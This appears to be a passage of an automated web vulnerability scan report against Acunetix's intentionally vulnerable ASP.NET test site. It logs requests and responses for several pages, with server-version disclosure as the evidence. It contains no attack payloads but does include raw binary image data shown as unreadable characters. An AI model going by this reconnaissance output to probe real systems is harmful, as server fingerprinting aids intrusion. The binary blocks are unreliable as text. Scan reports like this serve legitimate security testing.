Response Header - size: 248 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:54 GMT Accept-Ranges: bytes ETag: "6a79f47099c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 1919
Response Body - size: 1,919 bytes.	GIF89aôÕÿÿÿ`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâòìçóìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìöñìù÷õõðëùøõïèâøõñù÷öðéãíäÝõñë÷õñûûùîäÝðèãùøöøõðîäÞûúù÷õðöðëíäÞïéã!ù,ôÿ@pH,È¤rÉl:Ð¨tJZ¯Ø¬vËíz¿à°xL.Ïè´zÍn»ßð¸\|N¯Ûïø¼~ÏïûÿB ¡¢£¤¥¦§¨©ª«¬§H ±² , ±²³¾Â ¾Æ³±ÆÇÁÁÅ³Ï¾µ¶¿ºÅ0µºµÆÓ¿Î½¸Ë¾à´½ÇÈ²ÓÆ(²Í½çñé¹îçÜÁì´Þ ¹$ËtõÆ²jÊ#VïØ5}È´ã&/^EaàÈ& =uúHä nCÖf¼.à;½¶äÈÌ_Dán©c<ÿÅ¤Í6²]8êÂÈµ[óô«êF\2}M5ÖÕnìýR0` v´j×²uA¸#ÖªÍp·íÚ¾s3ÌÝk7.Ü´s+>¼Wí[½q·=Ì ÅúZfL7ñe¿9³Å¸4lS+lX-æ¿A#ZvâÚiïÒxn¾¥EsfW¯dÜÓ<ô©O:6êÁÍKüðé¹§~ÝøñÓÍî«ÛsöÃ××ì:¹ðêiAg,÷xsß¶`À 8ðÀ "è@<à .aJ¨aFÐÿz¸` 6ðFè >áHa~(¡!rh"²Èá,B(a/ã'ùâöx$x!)Þ8#8n"&a1zh£þ \ÙdBNØå?&¨ M"xbº£¢ã6vx" 6Ic<j8!6¢$fÙ¡%¡v.Ú"or b¦ ÊIá¥CÉà¨è¢s id¾ ¢J)"{xa$Þ)¦Ö8â°H@$«,Én ì³Ì2¬´ÏB»lµl-¶× -³`A ÝfK®³Ó àÿÁ´è ®·ãNK-´ÎB0¯½òr¯´ÚÖ»,¹Í2»n»ÜVïµörð.¾þªkí³lë-Âßí¼Éz -¼îJ\|ïºð¿ûîÆÉ¾°îÂÓ{ðÃ&CrÀ!?;s¶!\s·ÛëÁÅ§ô²2Èè2Û0Æ¼/»ßRlòÐØKðºPtÁAën, 6!`¤°Í6h/Á b·6b£6Ý·ô½÷ÞuóÍvÜ}/¸â·-xc7ßiÍxàó¸ÞO8à/¹ã&À ·Ü«Ý7ÞÿzÝh®9+lÿwåS>8á/øíºï\|ÞÞyñ.äÉ½öîríBî÷õd¿ÍºÙwW~ûÙº.¸Þe®{ó\|OÏ7ê#nzûlÀváì_÷¥§=ºÜz/·ûßùç:¸I z±s_îG»Öå®mo£øèÀ¶¥M+¸ å×¸Á.m @ (@ À.ð@ p!N¨Â°'á]¨CÀgxª H\!p0/,"cx&°<lâRHB.QTÔa]ÈÃ.¾ðe!.PÄ,ñOü!HÆ¢ÿq`ôágÈÅzñ8¤ nØÃâQUäáÏhÆ&²à¢F¸D60d,"«Ã1<á#sXDú±jÄ!%ÈÉ'v0\|ãMéJÖñN$£ 5ÙÊÀ),e&GÅñÆ<2'iJCþÐ:DfÏCTÑDd×¨ÆÖQ ä3×xM&òÍÌã')@HTÀ0< ðNxZàñD@<å©OXÀÿÜg<ÿYOzúsµ*PÏ~êð´ç>ÿ9Ï\|öhC-Px:4¢PèB+ÏyT$hHúP¤ å§AÊÏwÞ3¨Gå©PêÓ"ÝéA êPz´¥å)BéÙ>ô§)C¡Ï"´¤ÕhPç Töt'¸©@Tô¢ø<èXjR¬B dhEúÐî/@S¯ZÖ '(+USÒ-©?ÏØV§ôÌªcÑØ¥zÔ§'}§UÒ»Â3A;
URL	http://testaspnet.vulnweb.com/images/logo_acunetix.gif
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 336 bytes.	GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "7228247199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2506
Response Body - size: 2,506 bytes.	GIF89a2&æÿÿÿf@æÜÏá ???Í¿¬³¡¿¿¿jEdâØÊàÕÇnJþþýmIïïïÀ°uRÚÎ¾¦vº©///___ÓÆµOOO\|[Æ·£ÏÏÏßßß m¯¯¯á oooå1:æ:Bã$ä$-êU[èMTímráä3øÊÌíæ/8ítzðâ!öÂÅüééâìdjò²´âçFMâêioòüâãûÞßç@GèCJæBIö×Øïé_eúæçó£§õ¼½ô¨¬â!ä(ã&áë`fòº½ùßáôÅÇùØÙñ £ïýïïýîïúììñ¦¨èHNñ±÷ÓÔö²µüäåäýïðïõÌÍòüïïõ°³üíîï}!ù,2&ÿ ¡¢£¤¥¦§¨©ª«¬ ³´µ¶·¸¹º»¼½¾¿À» ®ÅÆÇÈÉÊÈ°²ÁÏÐÑÒÓÐÃËØÙÚÛÜ¡ÍÔàáâãÂÄÝçèéêßäî¶¿ïÒÖëûüýÆíøÞpÏ×A«óÇ°á©ppÜÀ½ ¨LÃ ? @2Â6Á]ü¥1å/ÉªÑÑHi ÉTFåRÜJòY,K¢JEø)¥v4cÒ±¹¶cª[·Dÿ`e¨Wu(Ñ+Ë«¥^\jW¥xKxª%sûÕ½.ï__\|wù}\+00 kJ#ñ¾ÅûSÞY×äÑ,Âlbóf.<«½Nt. `Á·&XÐ ¨fù>ÜÖòZ+äd ÂÓ´>Ä`ü\$PDÁ ¿÷R]Ek×®áh$H jÄ$mPBå·_ èÇß'$%ø"$]I4I8Ø¡4@¡°ß©ØvT] \-pÝY\´À!Ø4À-4¢Áÿèè{£ÈßN 1Ê@Õ I¡`°A@-ÀV¢I(&I"`^"Y'izR×âI¨¸XFhðqLWÜIpÀpÜãÑ25z¢ÌCvÓ àè¡Þ8Ë5 PÞ£ã!êäzð½ð\|±b&&a}g~Røb©+ÔÉkÐoDa´À^0"!>H'wzbf¸é+:u´,j¥@0¨ßµëä¤Bò8wGªz§ ,jÁ³L'A½ñÂ(È«KÅjJ©@CÿAÁÄù(#ä_2@Øg~\É¸&K@+Ë¢mbæÈ´ùI.À¶Y+/b-Uu=L)ttpËÓ~Êc ¨×.ÔñÇ0-óB\Î5©`aCa&´0ÊmV("ü)J @1HÒÏe«sÌòÊOÈ~2£¤LnÏßþòV_n0çé0×d5Ùù69µ¥ªæ6ð~ §·ì«Üé¸`ÍyZòÛ\x3¤071@QX ()´ß£¸Ü·ñb7GÀôÔc(,òyBÉ"»R¹ê¸8:ÿ¼¹à;¨¾ær©Öðº^¾ 7Ýï¢R?û(:¦'.¸'5(LpÐ¬Kd^ò3æe/ÏÖ²t=» \¢ÀPÀâ½£;ïøLS¿ZX}K£¼&c¾Îé(i»J1´¡b0ùº@"xB¹A7@ 3%ðÊÅ AQD$(§HÅ 2æ$@Î^áA]ÐâÅqÑB1¢#¶Èû¾&ùPÉaÕnÁ¤×æ~¢XAa¤æF@ Ã#^ÉduB"evA¾yâCã°x2î`rëb.æÆYÌÿcWEIDQ¸0]úf1$ãAeT 2ÒðlªXÛ[ f@BaÐT(Å+&F¶ÀeÂzt$k"d/ÎàÖÐ8¶OlÁYÝi1ÑõHi©«ÚÇGJV²Î·@ªìx(â !P±Þ¶ùºLøfôdMíÎ¤Ì0é q0?Øc¨2]¥ @Ð\|¢À«>`YèS§BÔÍ¨´zAÀa `ØiPÓxPUÃZ:P/`êºðç'\|I#@ïÿÊ <AÕ·ÓpÖPvÅ<qà.!¢'"P²-C[l5:´ÉEKi^#Ê¡:ÅÕháä£T( µxqtCsg_H¥¤Â©6\|Àwì1 pýlx ?¦3½ÌêLðU]¾Å Ê0t%2o{@}[)E¢>Ë( lK$X¼ê6ÃÅV¿5÷¬`ßU`çDØWÙb ÞWgë9$ìc£ÅQ a¨Â´¦RU?Z BôTÞâQ ÀÄ µ§,ôdBAÉGj´vZÙÿrýô`A±h¥¨- P Lå `ô§ °:i Øq0Ð Äø³¸Þ¸÷ð-Åì;&$òuEd CQHñ@ý¤xc&c"xrNÄ £æ/îdÚûGQ\Á-&ØºhA6xî tÏÌçYp-½ßKÚ,%A*èA~SaÀ +ÐÁóLiU¹ÏJqØÂjá0râ²Ò Æó¥1í¢nv;Åá'êVdÔ¤N MaÌÕÐÕ¸.sJcëzØQ84«sMìÚì×ÈT'ÍìlÀ:ÙÐN ¡Mme<;ÚÈ¶Æ&¶Íín{ûÛ¨¸ÇMîrS";
URL	http://testaspnet.vulnweb.com/images/rss.gif
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 326 bytes.	GET http://testaspnet.vulnweb.com/images/rss.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "8e76327199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 134
Response Body - size: 134 bytes.	GIF89a¢ÿfÿÿÿÿÈ¤?}3ÿW!ù,K(ºÜþ@«½8ËÌ»Ý^T`Ö¢ßT±pP2PS¤]Ç{å'î6ü¹h:0YîvH[wd2U¯eN$Úr=xL.Ï;
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvb